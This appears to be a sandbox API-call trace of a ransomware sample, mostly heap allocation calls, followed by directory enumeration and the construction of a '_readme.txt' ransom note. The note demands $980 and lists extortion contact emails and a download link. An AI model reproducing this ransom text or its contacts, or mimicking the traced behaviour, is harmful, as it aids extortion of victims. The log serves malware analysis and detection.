0x2e902a8 [0184.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.357] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0184.357] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.358] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.358] PathFindFileNameW (pszPath="") returned="" [0184.358] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.358] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.358] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.358] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.359] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0184.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.359] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0184.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.361] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.361] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.361] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.362] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*" (normalized: "c:\\boot\\pt-br\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.363] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.363] 